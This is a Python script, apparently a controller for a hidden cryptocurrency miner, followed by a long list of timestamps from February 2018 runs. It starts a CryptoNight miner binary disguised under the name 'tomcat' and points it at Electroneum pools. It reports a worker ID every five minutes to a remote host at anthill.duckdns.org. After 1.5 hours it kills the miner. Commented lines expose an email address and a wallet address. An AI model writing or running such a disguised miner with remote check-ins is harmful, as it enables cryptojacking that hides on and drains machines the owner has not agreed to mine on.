import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:12:04.308491
#2018-02-17 16:58:06.746369
#2018-02-17 18:48:04.116272
#2018-02-17 20:37:05.222341
#2018-02-17 22:23:04.774175
#2018-02-18 00:07:04.985905
#2018-02-18 01:58:05.683662
#2018-02-18 03:47:01.504878
#2018-02-18 05:33:04.463396
#2018-02-18 07:26:01.736116
#2018-02-18 09:13:01.586654
#2018-02-18 10:59:01.827952
#2018-02-18 12:45:07.989007
#2018-02-18 14:31:07.439840
#2018-02-18 16:21:01.407241
#2018-02-18 18:10:03.609836
#2018-02-18 19:56:01.524086
#2018-02-18 21:42:06.334842
#2018-02-18 23:31:03.765014
#2018-02-19 01:17:05.850077
#2018-02-19 03:04:03.676302
#2018-02-19 04:50:06.157620
#2018-02-19 06:35:07.737540
#2018-02-19 08:24:04.451636
#2018-02-19 10:13:07.888813
#2018-02-19 12:01:05.226047
#2018-02-19 13:47:01.748505
#2018-02-19 15:35:09.341641
#2018-02-19 17:22:09.635987
#2018-02-19 19:10:06.860943
#2018-02-19 20:57:01.687185
#2018-02-19 22:44:09.476805
#2018-02-20 00:29:04.475959
#2018-02-20 02:17:06.803019
#2018-02-20 04:08:01.719629
#2018-02-20 05:51:04.143608
#2018-02-20 07:36:08.182074
#2018-02-20 09:21:06.448590
#2018-02-20 11:05:01.863214
#2018-02-20 12:51:10.415955
#2018-02-20 14:36:08.054157
#2018-02-20 16:20:09.247858
#2018-02-20 18:08:05.286992
#2018-02-20 20:01:08.122120
#2018-02-20 21:49:05.798267
#2018-02-20 23:30:09.180059
#2018-02-21 01:15:09.225436
#2018-02-21 03:03:04.931484
#2018-02-21 04:53:04.301026
#2018-02-21 06:41:04.020952
#2018-02-21 08:28:06.181406
#2018-02-21 10:13:04.705464
#2018-02-21 12:01:01.536475
#2018-02-21 13:52:03.759453
#2018-02-21 15:38:08.073509
#2018-02-21 17:31:05.035256
#2018-02-21 19:17:20.973593
#2018-02-21 21:05:03.134657
#2018-02-21 22:52:01.334701
#2018-02-22 00:40:01.551765
#2018-02-22 02:29:03.859904
#2018-02-22 04:16:03.590894
#2018-02-22 06:01:01.335392
#2018-02-22 07:47:01.250493
#2018-02-22 09:35:05.519637
#2018-02-22 11:20:09.038605
#2018-02-22 13:05:11.381483
#2018-02-22 14:52:01.551999
#2018-02-22 16:37:05.977993
#2018-02-22 18:22:07.613763
#2018-02-22 20:16:08.453227
#2018-02-22 22:02:08.025801
#2018-02-22 23:48:06.025068
#2018-02-23 01:36:01.806953
#2018-02-23 03:22:07.667117
#2018-02-23 05:10:04.826553
#2018-02-23 06:55:03.009097
#2018-02-23 08:46:01.363024
#2018-02-23 11:10:10.541976
#2018-02-23 13:03:05.595962
#2018-02-23 14:49:01.236952
#2018-02-23 16:38:06.945607
#2018-02-23 18:25:07.665605
#2018-02-23 20:09:06.405681
#2018-02-23 21:58:05.243905
#2018-02-23 23:46:03.569632
#2018-02-24 01:38:07.255219
#2018-02-24 03:27:07.876366
#2018-02-24 05:12:07.076435
#2018-02-24 07:00:06.961988
#2018-02-24 08:50:05.169096
#2018-02-24 10:50:06.672446
#2018-02-24 12:38:01.298603
#2018-02-24 14:26:03.759790
#2018-02-24 16:14:01.977710
#2018-02-24 18:07:04.351719
#2018-02-24 19:53:06.495934
#2018-02-24 21:38:05.362048
#2018-02-25 00:28:01.563368
#2018-02-25 04:03:03.849132
#2018-02-25 07:35:01.800234